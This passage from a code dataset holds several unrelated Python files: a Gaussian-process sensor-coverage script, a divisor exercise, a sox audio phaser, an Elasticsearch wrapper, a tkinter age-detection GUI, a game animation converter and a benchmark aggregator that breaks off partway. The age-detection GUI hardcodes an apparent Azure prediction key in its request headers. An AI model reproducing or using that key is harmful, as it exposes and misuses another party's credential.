Taille de la grille de la regression\npseuil = 0.2 # seuil \\propto varsigma^2\nnp.random.seed(1235) # 1235 => 2 trous pour 20 capteurs\n\ndef field(z):\n return 0.7*np.exp(-16*abs(z-0.75-0.5j)**2) + 0.5*np.exp(-16*abs(z-0.2-0.7j)**2);\n\n\n##------------------------------------------------------------------------------\n## Capteurs\nclass Sensor:\n def __init__(self, id, z, f):\n self.id = id\n self.loc = z\n self.field = f\n self.covar = {}\n\n def __repr__(self):\n return \"%2d@%3f\" % (self.id, self.loc)\n\n\n##------------------------------------------------------------------------------\n## Gaussian Process stuff\n\ndef kernel(z, w, varsigma, ell):\n z = np.asarray(z)\n w = np.asarray(w)\n if z.shape == ():\n Z, W = z, w\n else:\n Z = z.flatten()[:, np.newaxis].repeat(w.size, axis=1)\n W = w.flatten()[np.newaxis, :].repeat(z.size, axis=0)\n return varsigma**2 * np.exp(-abs(Z-W)**2/ell**2)\n\n\ndef loglikelihood(zm, fm, s, t, n):\n R = lin.cholesky(kernel(zm, zm, s, t) + n * np.eye(zm.size), lower=True)\n return 
-sum(lin.solve(R, fm) ** 2) - np.log(R.diagonal().prod())\n\n\ndef precision(*vertices):\n K = np.array([[s.covar[t] for s in vertices] for t in vertices])\n ub = K.diagonal()\n lb = K.min(axis=1)\n H = lin.inv(K)\n H = (H + H.T)/2\n x,n,r = opt.fmin_tnc(func=lambda x: x.dot(H.dot(x)),\n fprime=lambda x: 2*H.dot(x),\n x0=(lb + ub)/2,\n bounds=zip(lb, ub),\n disp=0)\n return x.dot(H.dot(x))\n\n\n##------------------------------------------------------------------------------\n## Champ + Capteur + Estimation\n\n# Création du champ\netendue = np.linspace(0, 1, nsampling)\nxe, ye = np.meshgrid(etendue, etendue)\nze = xe + 1j*ye\nfe = field(ze)\n\n\n# Positionnement des capteurs\nzm = np.dot([1, 1j], np.random.rand(2, nsensors))\nfm = field(zm) + sigma_n * np.random.normal(size=zm.shape)\n\n\n# Optimisation des hyperparametres pour le GP\nvarsigma, ell = opt.fmin(lambda x: -loglikelihood(zm, fm, x[0], x[1], sigma_n), [1, 1], disp=False)\nprint(\"varsigma:\", varsigma, \"ell:\", ell)\n\n\n# Création des capteurs\nsensors = [Sensor(i, z, f) for i, z, f in zip(count(), zm, fm)]\nfor s in sensors:\n s.covar = dict((t, kernel(s.loc, t.loc, varsigma, ell)) for t in sensors)\n s.covar[s] = s.covar[s] + sigma_n**2\n\n\n# Estimation du champ par GP\nKmm = kernel(zm, zm, varsigma, ell) + sigma_n**2 * np.eye(nsensors)\nKem = kernel(ze, zm, varsigma, ell)\nKee = kernel(ze, ze, varsigma, ell)\n\nfs = Kem.dot(lin.solve(Kmm, fm)).reshape(ze.shape)\nvs = (Kee - Kem.dot(lin.solve(Kmm, Kem.T))).diagonal().reshape(nsampling, nsampling)\n\n\n##------------------------------------------------------------------------------\n## Construction du complexe\nK = CellComplex()\nneighbors = {}\n\n# Vertices\nfor s in sensors:\n K.add_cell(s)\n\n\n# Edges\nfor s, t in combinations(sensors, 2):\n if precision(s, t) > pseuil * varsigma**2:\n neighbors.setdefault(s, set()).add(t)\n neighbors.setdefault(t, set()).add(s)\n K.add_cell(frozenset([s, t]), [s, t])\n\n\n# k-cliques\nfor clique in max_cliques(neighbors, 4):\n for r in range(3, 5):\n for simplice in combinations(clique, r):\n bords = list(frozenset(s) for s in combinations(simplice, r-1))\n K.add_cell(frozenset(simplice), bords)\n\n\n##------------------------------------------------------------------------------\n## Homologie\nH = PairCells(K, lambda x: 0)\nholes = [H.cascade(s) for s in K.cells(1) if not H.partner(s)]\n\n\n##------------------------------------------------------------------------------\n# Affichage\nplt.figure()\n\n# Field\nplt.subplot(221)\nplt.imshow(fe, extent=(0,1,0,1), origin='lower')\nplt.title('Field')\n\n# Field estimation\nplt.subplot(222)\nplt.imshow(fs, extent=(0,1,0,1), origin='lower')\nplt.plot(zm.real, zm.imag, 'ko')\nplt.title('Field estimation')\n\n# Field estimation variance\nplt.subplot(223)\nplt.imshow(np.log(vs), extent=(0,1,0,1), origin='lower')\nplt.title('Field estimation variance (dB)')\n\n# Complex and holes\na = plt.subplot(224, aspect='equal')\nplt.title('Complex and coverage holes, WUSPE''s method')\na.axis([0, 1, 0, 1])\n\nfor sigma in K.cells(2):\n zs = np.array([(s.loc.real, s.loc.imag) for s in K.vertices(sigma)])\n p = mpatches.Polygon(zs, fill=True, facecolor='b', alpha=.4)\n a.add_artist(p)\n\nfor sigma in K.cells(1):\n zs = np.array([s.loc for s in K.vertices(sigma)])\n p = mlines.Line2D(zs.real, zs.imag, color='k')\n a.add_artist(p)\n\n \nfor h in holes:\n for e in h:\n zs = np.array([s.loc for s in e])\n p = mlines.Line2D(zs.real, zs.imag, color='r', lw=4, alpha=0.4)\n a.add_artist(p)\n\nplt.show(block=False) # 
Non-blocking call for ipython\n","repo_name":"alban-goupil/WSN-discrete-morse-theory","sub_path":"src/pycov.py","file_name":"pycov.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39031022418","text":"N, K = map(int, input().split())\nd_list = []\nfor i in range(1, N+1):\n if N % i == 0:\n d_list.append(i)\n\nif len(d_list) < K:\n print(0)\nelse:\n print(d_list[K-1])\n\n# 약수의 개수를 먼저 찾자.\n # 약수인 수의 배열을 하나 만들어 약수들을 저장하고 그 길이가 K보다 작으면 0 출력\n # 아니면 K번째 수 출력\n","repo_name":"yoseph0310/Algorithm_Python","sub_path":"BaekJoon/브론즈/3/2501_약수 구하기.py","file_name":"2501_약수 구하기.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70024459451","text":"#!/usr/bin/env python\n\nimport sox\n\n\nclass Sample(object):\n def __init__(self,\n file_name='master_sample.wav',\n start_pad_duration=0,\n end_pad_duration=0):\n self.file_name = file_name\n self.full_duration = sox.file_info.duration(file_name)\n self.start_pad_duration = start_pad_duration\n self.end_pad_duration = end_pad_duration\n\n\nclass Phase(object):\n def __init__(self,\n sample_file_name='master_sample.wav',\n output_file_name='output.wav',\n start_pad_duration=0,\n end_pad_duration=0):\n\n self.sox = sox\n self.sample = Sample(\n sample_file_name,\n start_pad_duration=start_pad_duration,\n end_pad_duration=end_pad_duration)\n self.output_file_name = output_file_name\n self.temp_folder = 'tmp/'\n\n def make_track(self,\n output_file_name,\n gap,\n repeat_count,\n has_initial_rest=False,\n mute_first=False,\n mute_last=False):\n\n rest_duration = self.sample.full_duration + gap - self.sample.start_pad_duration - self.sample.end_pad_duration\n\n if mute_first or mute_last:\n repeat_count -= 1\n\n tfm = sox.Transformer()\n tfm.pad(end_duration=rest_duration)\n if repeat_count > 0:\n tfm.repeat(count=repeat_count)\n if has_initial_rest:\n tfm.pad(start_duration=rest_duration + ((self.sample.full_duration - rest_duration) / 2.0))\n if mute_first:\n tfm.pad(start_duration=self.sample.full_duration + rest_duration)\n if mute_last:\n tfm.pad(end_duration=self.sample.full_duration + rest_duration)\n\n tfm.build(self.sample.file_name, output_file_name)\n\n def checker_track(self,\n output_file_name,\n gap=1.0,\n repeat_count=5,\n mute_first=False,\n mute_last=False):\n\n \"\"\"Repeat the sample on alternating tracks so the fade in and out can overlap\"\"\"\n\n track_a_file = self.temp_folder + 'track-a.wav'\n track_b_file = self.temp_folder + 'track-b.wav'\n\n half, remainder = divmod(repeat_count, 2)\n track_a_repeat_count = half + remainder - 1\n track_b_repeat_count = half - 1\n\n if mute_last:\n if remainder:\n # there are an odd number of repeats, so the muted last repetition is in track A\n self.make_track(track_a_file, gap, track_a_repeat_count, mute_last=mute_last)\n self.make_track(track_b_file, gap, track_b_repeat_count, has_initial_rest=True)\n else:\n # there are an even number of repeats, so the muted last repetition is in track B\n self.make_track(track_a_file, gap, track_a_repeat_count)\n self.make_track(track_b_file, gap, track_b_repeat_count, has_initial_rest=True, mute_last=mute_last)\n\n else:\n self.make_track(track_a_file, gap, track_a_repeat_count, mute_first=mute_first)\n self.make_track(track_b_file, gap, track_b_repeat_count, has_initial_rest=True)\n\n cbn = sox.Combiner()\n cbn.build([track_a_file, track_b_file], 
output_file_name, 'mix-power')\n\n def phase(self,\n output_file_name=None,\n n_tracks=9,\n gap=.03,\n repeat_count=20,\n end_align=False):\n\n if output_file_name == None:\n output_file_name = self.output_file_name\n track_file_names = []\n for i in range(1, n_tracks + 1):\n track_file_name = self.temp_folder + 'track-{}.wav'.format(i)\n track_file_names.append(track_file_name)\n\n mute_first = False\n if not end_align and i is not 1:\n mute_first = True\n\n mute_last = False\n if end_align and i is not n_tracks:\n mute_last = True\n\n self.checker_track(\n track_file_name,\n gap=gap * i,\n repeat_count=repeat_count,\n mute_first=mute_first,\n mute_last=mute_last)\n\n if end_align:\n track_durations = [sox.file_info.duration(f) for f in track_file_names]\n longest_track_duration = max(track_durations)\n track_duration_diffs = [longest_track_duration - d for d in track_durations]\n new_track_file_names = []\n for i, diff, track_file_name in zip(range(1, n_tracks + 1), track_duration_diffs, track_file_names):\n new_track_file_name = track_file_name[:-4] + '-start-offset.wav'\n new_track_file_names.append(new_track_file_name)\n tfm = sox.Transformer()\n tfm.pad(start_duration=diff + (gap * i))\n tfm.build(track_file_name, new_track_file_name)\n track_file_names = new_track_file_names\n\n cbn = sox.Combiner()\n cbn.silence(location=1) # Remove silence from the beginning\n cbn.silence(location=-1) # Remove silence from the end\n cbn.build(track_file_names, output_file_name, 'mix-power')\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-n',\n '--n-tracks',\n help='how many tracks to generate',\n type=int,\n default=9)\n parser.add_argument(\n '-g',\n '--gap',\n help='the smallest gap between phrases',\n type=float,\n default=.03)\n parser.add_argument(\n '-r',\n '--repeat-count',\n help='the number of times the phrase should repeat',\n type=int,\n default=20)\n parser.add_argument(\n '-e',\n '--end-align',\n help='come together in the end, rather than starting out together',\n action='store_true',\n default=False)\n\n args = parser.parse_args()\n\n phaser = Phase()\n phaser.phase(\n n_tracks=args.n_tracks,\n gap=args.gap,\n repeat_count=args.repeat_count,\n end_align=args.end_align)\n","repo_name":"jonathanmarmor/stable","sub_path":"phase.py","file_name":"phase.py","file_ext":"py","file_size_in_byte":6061,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"12174013935","text":"from elasticsearch import Elasticsearch\n\nfrom settings import HOST, PORT, INDEX\n\n\nclass search(object):\n def __init__(self):\n self.connection = Elasticsearch([{'host': HOST, 'port': PORT}])\n pass\n\n def request(self, query):\n result = self.connection.search(index=INDEX, body={\n 'query': {\n 'match': {\n 'abstract': {\n 'query': query,\n 'operator': 'or'\n }\n }\n },\n 'sort': ['_score']\n })\n\n response = result['hits']['hits']\n return list(map(lambda x: x['_source'], response))\n\n def papers(self, ids):\n if len(ids) == 0:\n return []\n\n response = self.connection.mget(index=INDEX,\n doc_type='articles',\n body={'ids': ids})\n\n founded = lambda x: x['found']\n source = lambda x: x['_source']\n return list(map(source, filter(founded, response['docs'])))\n","repo_name":"wimag/ABC","sub_path":"server/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} 
+{"seq_id":"21039810084","text":"import tkinter\nfrom tkinter import filedialog\nimport numpy as np\nfrom PIL import Image, ImageTk\nimport requests\n\ndef select_file():\n global selectedfile, idPrediction\n filetypes = (('jpg files', '*.jpg'),('png files', '*.png'))\n selectedfile = filedialog.askopenfilename(title='Open a file',initialdir='/',filetypes=filetypes)\n image_binary=open(selectedfile,\"rb\").read()\n get_data(image_binary)\n img=Image.open(selectedfile)\n if(img.width>800 or img.height>600):\n if(img.width>img.height):\n ratio=img.width//800\n else:\n ratio=img.height//600\n img=img.resize((int(img.width/ratio),int(img.height/ratio)))\n img = ImageTk.PhotoImage(img)\n image_holder.configure(image=img)\n image_holder.image=img\n image_holder.update()\n\ndef get_data(image):\n api=\"https://westeurope.api.cognitive.microsoft.com/customvision/v3.0/Prediction/ae92ba00-9473-4623-8c0e-222b55e5c928/classify/iterations/Age%20detection%20model/image\"\n headers={'Prediction-Key':'dd0d11819da040928e44d10890ec2044','Content-Type':'application/octet-stream'}\n response = requests.post(api,headers=headers,data=image)\n if response.status_code == 200:\n response_dict=response.json()\n probabilities=\"Age group probability:\"+'\\n'+'\\n'\n for i in range(len(response_dict[\"predictions\"])):\n tag=response_dict[\"predictions\"][i][\"tagName\"]\n probabilities+=(str(round(response_dict[\"predictions\"][i][\"probability\"]*100,2))+\"% \"+tag)+'\\n'\n text_holder.configure(text=probabilities)\n else:\n print(f\"Hello person, there's a {response} error with your request\")\n\nglobal cam, selectedfile,idPrediction,image_holder, text_holder, img\nidPrediction=[]\n\nwindow=tkinter.Tk()\nwindow.title(\"Age prediction\")\nframe=np.random.randint(0,255,[600,800,3],dtype='uint8')\nimg = ImageTk.PhotoImage(Image.fromarray(frame))\nimage_holder=tkinter.Label(window, bg=\"#fff\")\nimage_holder.configure(image=img,width=800, height=600)\nimage_holder.grid(row=0,column=0,pady=10,padx=10)\nmessage=\"Waiting for image selection\"\ntext_holder=tkinter.Label(window,text=message,bg='#fff')\ntext_holder.grid(row=0, rowspan=5,column=1,pady=1,padx=20)\nbuttonsize=10\nopen_button = tkinter.Button(window,text='Select image',command=select_file)\nopen_button.grid(row=1,column=0,columnspan=2,pady=10,padx=1)\nimage_holder.update()\nwindow.mainloop()\n","repo_name":"fury565/RUAP-Projekt","sub_path":"AgeDetectionGUI.py","file_name":"AgeDetectionGUI.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10184350114","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport re\nimport json\n\nfrom bs4 import BeautifulSoup\n\n\n\ndef filter_use_data(content):\n pattern = re.compile(r'([\\w ]+)')\n l = pattern.split(content)[1:]\n i = 0\n q = {}\n result = []\n for s in l:\n if i % 2 == 0:\n q = {\"name\": s}\n else:\n q[\"content\"] = s\n result.append(q)\n i = i + 1\n return result\n\n\ndef replenish_omit_data(image_xml_data):\n content = image_xml_data['content']\n soup = BeautifulSoup(content, 'html.parser')\n frame_list = soup.find_all('t')\n pre_frame_data = None\n use_pre = False\n image = None\n final_data = []\n index = 0\n is_none = False\n for frame in frame_list:\n json_data = {}\n if pre_frame_data is not None:\n use_pre = True\n for arg in 
frame.children:\n arg_name = arg.name\n arg_data = arg.string\n if arg_name == \"i\":\n arg_data = arg_data.replace(\"IMAGE_REANIM_\", \"\").lower()\n image = arg_data\n json_data[arg_name] = arg_data\n if arg_name == \"f\":\n if arg_data == \"-1\":\n is_none = True\n # use_pre = False\n else:\n is_none = False\n if image is None:\n is_none = True\n # else:\n # if \"gatlingpea_blink\" in image:\n # print(pre_frame_data)\n replenish_args_default_map = {'sx': 1, 'sy': 1, 'kx': 0, 'ky': 0, 'x': 0, 'y': 0, \"i\": None}\n index = index + 1\n if not is_none and pre_frame_data is not None and use_pre:\n for replenish_arg in replenish_args_default_map:\n if replenish_arg not in json_data and replenish_arg in pre_frame_data:\n json_data[replenish_arg] = pre_frame_data[replenish_arg]\n\n if not is_none:\n for replenish_arg in replenish_args_default_map:\n if replenish_arg not in json_data:\n json_data[replenish_arg] = replenish_args_default_map[replenish_arg]\n pre_frame_data = json_data\n if image is not None:\n json_data[\"i\"] = image\n # else:\n # pre_frame_data = None\n\n final_data.append(json_data)\n image_xml_data['content'] = final_data\n\n\ndef getFrame(num, l):\n result = []\n for i in l:\n content = i[\"content\"][num]\n q = {}\n for k in content:\n if content[k] is not None:\n q[k] = content[k]\n if len(q) != 0:\n result.append(q)\n return result\n\n\ndef remove_action_data(image_xml_data_list):\n action_map = {}\n need_remove_map = {}\n for image_data in image_xml_data_list:\n content = image_data['content']\n empty = True\n filter_name = image_data['name'].replace(\"anim_\", \"\")\n for json_data in content:\n if \"i\" in json_data:\n empty = False\n need_remove_map[filter_name] = empty\n if (\"anim_\" in image_data['name']) or image_data['name'] == \"Sun1\":\n action_map[filter_name] = {}\n filter_data_list = []\n for image_data in image_xml_data_list:\n filter_name = image_data['name'].replace(\"anim_\", \"\")\n if not need_remove_map[filter_name]:\n filter_data_list.append(image_data)\n index = 0\n content = image_data['content']\n if filter_name not in action_map:\n continue\n begin = None\n over = None\n if \"f\" not in content[0] or content[0][\"f\"] == 0:\n begin = 0\n # print(content)\n # print(len(content))\n for c in content:\n if begin is not None and over is not None:\n break\n if begin is None and len(c) > 0:\n if not (\"f\" in c and c['f'] == \"-1\"):\n begin = index\n if over is None and begin is not None and len(c) > 0:\n if \"f\" in c and c['f'] == \"-1\":\n over = index - 1\n index = index + 1\n\n if over is None:\n over = index - 1\n\n action_map[filter_name]['begin'] = begin\n action_map[filter_name]['over'] = over\n image_xml_data_list.clear()\n for filter_data in filter_data_list:\n image_xml_data_list.append(filter_data)\n return action_map\n\n\ndef c_build(begin, over, all_image_data_list):\n result = []\n i = begin\n while i <= over:\n child_result = []\n for image_data_list in all_image_data_list:\n data = image_data_list['content'][i]\n if \"f\" in data:\n data.pop(\"f\")\n if len(data) > 0:\n child_result.append(image_data_list['content'][i])\n i = i + 1\n result.append(child_result)\n return result\n\n\ndef speed_build(begin, over, speed_data):\n result = []\n i = begin\n\n while i <= over:\n result.append(speed_data[i])\n i = i + 1\n return result\n\n\ndef get_speed_data(original_data_list):\n result = []\n content = None\n now_x = None\n for data in original_data_list:\n if data['name'] == '_ground':\n content = data['content']\n if content is None:\n 
return result\n for frame in content:\n speed = 0\n if \"f\" in frame:\n if frame[\"f\"] == \"0\":\n speed = 0\n now_x = float(frame['x'])\n else:\n speed = 0\n elif \"x\" not in frame:\n speed = 0\n else:\n x = float(frame['x'])\n if (now_x == None):\n now_x = x\n speed = '%.4f' % (x - now_x)\n now_x = x\n result.append(float(speed))\n\n return result\n\n\ndef build(name):\n with open(\"zombie\" + \"/\" + name + '.reanim') as file_obj:\n content = file_obj.read()\n original_data_list = filter_use_data(content)\n\n for original_data in original_data_list:\n replenish_omit_data(original_data)\n speed_data = get_speed_data(original_data_list)\n action_map = remove_action_data(original_data_list)\n\n result = {}\n images = set()\n\n for action in action_map:\n data = action_map[action]\n result[action] = {}\n action_list = c_build(data['begin'], data['over'], original_data_list)\n for w in action_list:\n for e in w:\n images.add(e['i'])\n\n result[action]['actionList'] = action_list\n if len(speed_data) > 0:\n speed_list = speed_build(data['begin'], data['over'], speed_data)\n speed_list = speed_list[1:] + [0]\n result[action]['speedList'] = speed_list\n l=[]\n for image in images:\n l.append(image)\n with open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\json\\\\\" + name + \".json\", \"w\", encoding='utf-8') as f:\n f.write(json.dumps(result))\n f.close()\n\nif __name__ == '__main__':\n l = ['LadderZombie']\n for i in l:\n build(i)\n","repo_name":"vajva/PVZ-ReanimToJson","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25708060419","text":"\"\"\"Processes .csv result files and aggregates them.\"\"\"\n\nimport argparse\nimport csv\nfrom datetime import date\nimport logging\nimport os\nimport re\nimport sys\nimport tiers\nimport itertools\nfrom typing import Any, Dict, List\nimport numpy as np\nfrom scipy.stats.mstats import gmean\n\ntry:\n import matplotlib.pyplot as plt\n import matplotlib.dates as mdates\n has_matplotlib = True\nexcept ImportError:\n has_matplotlib = False\n\nlogger = logging.getLogger(__name__)\n\ntest_to_csv_field_name = {\n 'inference': {\n 'test': 'eval',\n 'xla_label': 'openxla_eval',\n 'inductor_label': 'inductor',\n },\n 'training': {\n 'test': 'train',\n 'xla_label': 'openxla',\n 'inductor_label': 'inductor',\n },\n}\n\n\ndef find_files(input_dirname: str) -> List[str]:\n files = []\n for root, _, filenames in os.walk(input_dirname):\n for filename in filenames:\n match = re.search(r'.*\\.csv$', filename)\n if match:\n files.append(os.path.join(root, filename))\n return files\n\n\ndef clean_up_accelerator_model(model: str) -> str:\n if re.search(r'One of Tesla V100', model):\n return 'v100'\n if re.search(r'One of Quadro P1000, NVIDIA RTX A6000', model):\n return 'a6000'\n if re.search(r'NVIDIA A100-SXM4-40GB', model):\n return 'a100'\n sys.exit(f\"fatal: cannot recognize accelerator model: '{model}'.\")\n\n\ndef skip_model(args, model_name: str):\n return (not re.search(\"|\".join(args.filter), model_name, re.I) or\n re.search(\"|\".join(args.exclude), model_name, re.I))\n\n\ndef process_file(args, results_map: Dict[str, Any], filename: str):\n with open(filename) as check_header_file:\n try:\n has_header = csv.Sniffer().has_header(check_header_file.read(1024))\n except csv.Error:\n logger.error('Cannot read CSV in %s, skipping.', filename)\n return\n if not has_header:\n logger.error('Cannot interpret %s: missing 
headers.', filename)\n return\n fields = (\n 'model_name',\n 'accelerator_model',\n 'dynamo',\n 'test',\n 'batch_size',\n 'median_total_time',\n )\n with open(filename) as read_file:\n reader = csv.reader(read_file)\n headers = next(reader)\n if headers[0] != 'timestamp':\n logger.error('Missing timestamp in CSV in %s, skipping.', filename)\n return\n field2index = {}\n for i, header in enumerate(headers):\n for field in fields:\n if field == header:\n field2index[field] = i\n for row in reader:\n timestamp = row[0]\n model_name = row[field2index['model_name']]\n if skip_model(args, model_name):\n continue\n accelerator_model = clean_up_accelerator_model(\n row[field2index['accelerator_model']])\n if accelerator_model != args.accelerator:\n continue\n dynamo = row[field2index['dynamo']]\n test = row[field2index['test']]\n if test != test_to_csv_field_name[args.test]['test']:\n continue\n batch_size = row[field2index['batch_size']]\n median_total_time = row[field2index['median_total_time']]\n if timestamp not in results_map:\n results_map[timestamp] = {}\n if dynamo not in results_map[timestamp]:\n results_map[timestamp][dynamo] = {}\n if (model_name not in results_map[timestamp][dynamo]):\n results_map[timestamp][dynamo][model_name] = {}\n if (batch_size not in results_map[timestamp][dynamo][model_name]):\n results_map[timestamp][dynamo][model_name][batch_size] = {}\n results_map[timestamp][dynamo][model_name][batch_size] = median_total_time\n\n\ndef summarize_speedups(acc_map: Dict[str, Any], label: str):\n if label not in acc_map:\n return\n acc_map[f'{label}:gmean'] = gmean(acc_map[label])\n for p in (5, 50, 95):\n percentile = float(np.percentile(acc_map[label], p))\n acc_map[f'{label}:p{p}'] = percentile\n\n\n# The speedup values are stored in acc_map[out_label]; the corresponding\n# model names are stored in acc_map[f'{out_label}:model_name'].\ndef compute_speedups(acc_map: Dict[str, Any], baseline: Dict[str, Any],\n out_label: str, in_label: str):\n model_label = f'{out_label}:model_name'\n if in_label not in acc_map:\n return\n for model_name, v in acc_map[in_label].items():\n if model_name not in baseline:\n continue\n speedups = []\n # If we are running several batch sizes, keep the geomean of their speedups.\n for batch_size in v:\n experiment_time = v[batch_size]\n baseline_time = baseline[model_name].get(batch_size, None)\n if not experiment_time or not baseline_time:\n continue\n speedups.append(float(baseline_time) / float(experiment_time))\n if speedups:\n if out_label not in acc_map:\n acc_map[out_label] = []\n acc_map[out_label].append(gmean(speedups))\n if model_label not in acc_map:\n acc_map[model_label] = []\n acc_map[model_label].append(model_name)\n summarize_speedups(acc_map, out_label)\n\n\n# A benchmark's baseline is the oldest Inductor perf number we have for it.\n# This way we can track both Pytorch/XLA and Inductor perf improvements over\n# time.\ndef compute_baseline(results_map: Dict[str, Any]) -> Dict[str, Any]:\n baseline = {}\n for ts in sorted(list(results_map.keys())):\n if 'inductor' not in results_map[ts]:\n continue\n for model_name in results_map[ts]['inductor']:\n if model_name not in baseline:\n baseline[model_name] = {}\n for batch_size in results_map[ts]['inductor'][model_name]:\n if batch_size not in baseline[model_name]:\n baseline[model_name][batch_size] = results_map[ts]['inductor'][\n model_name][batch_size]\n return baseline\n\n\ndef process_results(args, results_map: Dict[str, Any]):\n baseline = compute_baseline(results_map)\n for 
timestamp in results_map:\n acc_map = results_map[timestamp]\n\n name2field = test_to_csv_field_name[args.test]\n compute_speedups(acc_map, baseline, 'xla:speedups', name2field['xla_label'])\n compute_speedups(acc_map, baseline, 'inductor:speedups',\n name2field['inductor_label'])\n\n\ndef maketitle(args, title: str):\n if args.title:\n title += f'\\n{args.title}'\n return title\n\n\ndef pr_latest(results_map: Dict[str, Any], args, timestamps: List[str]):\n prefixes = ('inductor', 'xla')\n speedups = [[], []]\n model_names = [[], []]\n speedup_timestamps = [[], []]\n\n for i, pfx in enumerate(prefixes):\n label = f'{pfx}:speedups'\n model_label = f'{label}:model_name'\n for timestamp in reversed(timestamps):\n acc_map = results_map[timestamp]\n if label in acc_map:\n (speedups[i], model_names[i]) = map(\n list, zip(*sorted(zip(acc_map[label], acc_map[model_label]))))\n speedup_timestamps[i] = timestamp\n break\n if not speedups[0] or not speedups[1]:\n logger.warning(f'cannot find data for accelerator {args.accelerator}')\n return\n\n if args.format == 'csv':\n print('# WorkloadNumber,Speedup(Inductor/Oldest Inductor),'\n 'ModelName(Inductor),Speedup(PytorchXLA/Oldest Inductor),'\n 'ModelName(PytorchXLA)')\n # Use zip_longest because the latest timestamp might not have complete\n # results for all benchmarks.\n for i, z in enumerate(itertools.zip_longest(speedups[0], speedups[1])):\n print(','.join(\n map(str, [\n i, z[0], model_names[0][i] if z[0] else None, z[1],\n model_names[1][i] if z[1] else None\n ])))\n else:\n plt.axhline(y=1.0, color='lightgray')\n plt.plot(speedups[0], label='Inductor', marker='^')\n plt.plot(speedups[1], label='PytorchXLA', marker='o')\n plt.legend()\n dates = date.fromtimestamp(float(speedup_timestamps[0]))\n if speedup_timestamps[0] != speedup_timestamps[1]:\n dates = f'{dates} (Inductor)'\n dates += ', {date.fromtimestamp(float(dates[1]))} (PytorchXLA)'\n plt.title(\n maketitle(args,\n f'Speedup over Oldest Benchmarked Inductor as of {dates}'))\n plt.xlabel('Workload Number')\n plt.ylabel(f'Speedup')\n plt.savefig(sys.stdout.buffer)\n\n\ndef pr_histogram(results_map: Dict[str, Any], args, timestamps: List[str]):\n percentiles = [f'p{p}' for p in (95, 50, 5)]\n prefixes = ('inductor', 'xla')\n labels = [f'{pfx}:speedups:{p}' for pfx in prefixes for p in percentiles]\n titles = [\n l.replace(':speedups:',\n ' ').replace('xla',\n 'PytorchXLA').replace('inductor', 'Inductor')\n for l in labels\n ]\n x = []\n y = [[] for i in range(len(labels))]\n for timestamp in timestamps:\n if labels[0] in results_map[timestamp]:\n for label in labels:\n assert label in results_map[timestamp]\n x.append(date.fromtimestamp(float(timestamp)))\n for i, label in enumerate(labels):\n y[i].append(results_map[timestamp][label])\n if args.format == 'csv':\n titles = ['# Datetime'] + titles\n print(','.join(titles))\n for i, datetime in enumerate(x):\n print(','.join([str(datetime)] +\n [str(y[j][i]) for j in range(len(labels))]))\n else:\n fig, ax = plt.subplots()\n ax.axhline(y=1.0, color='lightgray')\n markers = ('^', 'o')\n linestyles = ('solid', 'dotted')\n for i, label in enumerate(labels):\n style = int(i / len(percentiles))\n ax.plot(\n x,\n y[i],\n label=titles[i],\n marker=markers[style],\n linestyle=linestyles[style])\n ax.xaxis.set_major_formatter(\n mdates.ConciseDateFormatter(ax.xaxis.get_major_locator()))\n plt.legend()\n plt.xlabel(\"Date\")\n plt.ylabel(\"Geomean Speedup\")\n plt.title(\n maketitle(args,\n 'Histogram of Speedup over Oldest Benchmarked Inductor'))\n 
plt.savefig(sys.stdout.buffer)\n\n\ndef pr_gmean(results_map: Dict[str, Any], args, timestamps: List[str]):\n label = f'speedups:gmean'\n x = []\n y0 = []\n y1 = []\n for timestamp in timestamps:\n if 'inductor:speedups:gmean' not in results_map[\n timestamp] or 'xla:speedups:gmean' not in results_map[timestamp]:\n continue\n x.append(date.fromtimestamp(float(timestamp)))\n y0.append(results_map[timestamp]['inductor:speedups:gmean'])\n y1.append(results_map[timestamp]['xla:speedups:gmean'])\n if args.format == 'csv':\n print(\n '# Datetime,Speedup(Inductor/Oldest Inductor),Speedup(PytorchXLA/Oldest Inductor)'\n )\n for a, b, c in zip(x, y0, y1):\n print(','.join(map(str, [a, b, c])))\n else:\n fig, ax = plt.subplots()\n ax.axhline(y=1.0, color='lightgray')\n ax.plot(x, y0, marker='^', label='Inductor')\n ax.plot(x, y1, marker='o', label='PytorchXLA')\n ax.xaxis.set_major_formatter(\n mdates.ConciseDateFormatter(ax.xaxis.get_major_locator()))\n plt.legend()\n plt.xlabel(\"Date\")\n plt.ylabel(\"Geomean Speedup\")\n plt.title(maketitle(args, 'Speedup over Oldest Benchmarked Inductor'))\n plt.savefig(sys.stdout.buffer)\n\n\ndef pr_results(results_map: Dict[str, Any], args):\n timestamps = list(results_map.keys())\n timestamps.sort()\n\n if args.format == 'png' and not has_matplotlib:\n sys.exit('Fatal: cannot find matplotlib packages needed for PNG output.')\n\n if args.report == 'latest':\n return pr_latest(results_map, args, timestamps)\n elif args.report == 'histogram':\n return pr_histogram(results_map, args, timestamps)\n elif args.report == 'speedup':\n return pr_gmean(results_map, args, timestamps)\n else:\n sys.exit('unreachable')\n\n\ndef parse_args(args=None):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--accelerator',\n default='v100',\n choices=['a100', 'v100', 'a6000'],\n help='Accelerator.')\n parser.add_argument(\n \"--exclude\",\n \"-x\",\n action=\"append\",\n default=[],\n help=\"filter out benchmarks with regexp\")\n parser.add_argument(\n \"--exclude-by-tier\",\n type=int,\n action=\"append\",\n default=[],\n help=\"filter out benchmarks by predefined tier 1-3\",\n )\n parser.add_argument(\n \"--filter\",\n \"-k\",\n action=\"append\",\n 